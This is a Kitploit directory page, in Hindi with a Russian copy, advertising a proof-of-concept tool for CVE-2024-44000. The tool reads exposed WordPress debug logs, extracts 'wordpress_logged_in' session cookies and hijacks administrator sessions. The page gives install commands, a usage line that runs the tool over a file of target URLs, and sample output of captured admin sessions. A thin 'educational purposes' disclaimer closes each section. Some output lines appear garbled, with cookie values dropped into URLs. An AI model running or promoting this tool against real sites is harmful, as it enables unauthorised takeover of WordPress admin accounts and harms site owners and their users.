Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/geniuszly/cve-2024-44000
शोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubgeniuszly/cve-2024-44000

CVE-2024-44000

एक PoC उपकरण है जो असुरक्षित रूप से उजागर डीबग लॉग्स का शोषण करने और वर्डप्रेस साइट्स से सेशन कुकीज़ निकालने के लिए डिज़ाइन किया गया है

रिपॉजिटरी देखें
51 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

EN

GenCookieSessionHijack एक PoC उपकरण है जिसे WordPress साइटों से असुरक्षित रूप से उजागर डीबग लॉग का शोषण करने और सत्र कुकीज़ निकालने के लिए डिज़ाइन किया गया है। यह हमलावर को सक्रिय व्यवस्थापक सत्रों को हाईजैक करने और WordPress एडमिन डैशबोर्ड तक अनधिकृत पहुंच प्राप्त करने की अनुमति देता है।

विशेषताएँ

  • WordPress डीबग लॉग से कुकीज़ निकालें।
  • सत्र कुकीज़ (जैसे, wordpress_logged_in) की पहचान करें और फ़िल्टर करें।
  • व्यवस्थापक पहुंच के लिए स्वचालित रूप से सत्र हाईजैकिंग का प्रयास करें।
  • हाईजैक किए गए व्यवस्थापक सत्र को सीधे ब्राउज़र में खोलें।

उपयोग

स्थापना

git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt

उपकरण चलाना

  1. लक्ष्य WordPress URL की एक सूची एक फ़ाइल में तैयार करें, प्रति पंक्ति एक (जैसे, list.txt)।
  2. निम्नलिखित कमांड का उपयोग करके उपकरण चलाएँ:
python GenCookieSessionHijack.py -f list.txt -o result.txt

पैरामीटर

  • -f, --file: URL की सूची वाली फ़ाइल का पथ (डिफ़ॉल्ट: list.txt)।
  • -o, --output: परिणाम सहेजने के लिए फ़ाइल (डिफ़ॉल्ट: result.txt)।

उदाहरण

python GenCookieSessionHijack.py -f targets.txt -o output.txt

यह targets.txt से URL की सूची पढ़ेगा, सत्र कुकीज़ निकालने और उपयोग करने का प्रयास करेगा, और परिणाम output.txt में सहेजेगा।

आउटपुट

यदि सत्र हाईजैकिंग का प्रयास सफल होता है, तो उपकरण हाईजैक किए गए व्यवस्थापक सत्र कुकी के साथ एक URL उत्पन्न करेगा और इसे सीधे डिफ़ॉल्ट ब्राउज़र में खोलेगा।

उदाहरण आउटपुट:

[+] Лог-файл успешно получен с http://example.com
[+] Найдены session cookies для http://example.com:
    wordpress_logged_in_abcdef123456
[+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
[+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
[+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456

[-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie

[-] Session cookies не найдены в логах для http://another-example.com
[-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404

कानूनी अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है और इसका उपयोग अवैध गतिविधियों के लिए नहीं किया जाना चाहिए। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।

RU

GenCookieSessionHijack — это PoC скрипт, созданный для эксплуатации уязвимо раскрытых отладочных логов на сайтах WordPress с целью извлечения сессионных cookies. Это позволяет злоумышленнику перехватить активные сеансы администратора и получить несанкционированный доступ к панели администрирования WordPress.

Особенности

  • Извлечение cookies из отладочных логов WordPress.
  • Идентификация и фильтрация сессионных cookies (например, wordpress_logged_in).
  • Автоматическая попытка захвата сеанса для доступа в админку.
  • Открытие захваченного сеанса администратора непосредственно в браузере.

Использование

Установка

git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt

Запуск программы

  1. Подготовьте файл со списком целевых URL WordPress, по одному на строку (например, list.txt).
  2. Запустите программу следующей командой:
python GenCookieSessionHijack.py -f list.txt -o result.txt

Параметры

  • -f, --file: Путь к файлу со списком URL (по умолчанию: list.txt).
  • -o, --output: Файл для сохранения результатов (по умолчанию: result.txt).

Пример

python GenCookieSessionHijack.py -f targets.txt -o output.txt

Это прочитает список URL из targets.txt, попытается извлечь и использовать сессионные cookies, и сохранит результаты в output.txt.

Результаты

Если попытка захвата сеанса успешна, инструмент сгенерирует URL с захваченным сессионным cookie администратора и откроет его непосредственно в браузере.

Пример вывода:

[+] Лог-файл успешно получен с http://example.com
[+] Найдены session cookies для http://example.com:
    wordpress_logged_in_abcdef123456
[+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
[+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
[+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456

[-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie

[-] Session cookies не найдены в логах для http://another-example.com
[-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404

Отказ от ответственности

Этот инструмент предназначен исключительно для образовательных целей и не должен использоваться для незаконных действий. Автор не несет ответственности за любое неправомерное использование или ущерб, вызванный этим инструментом.

टूल डाउनलोड करें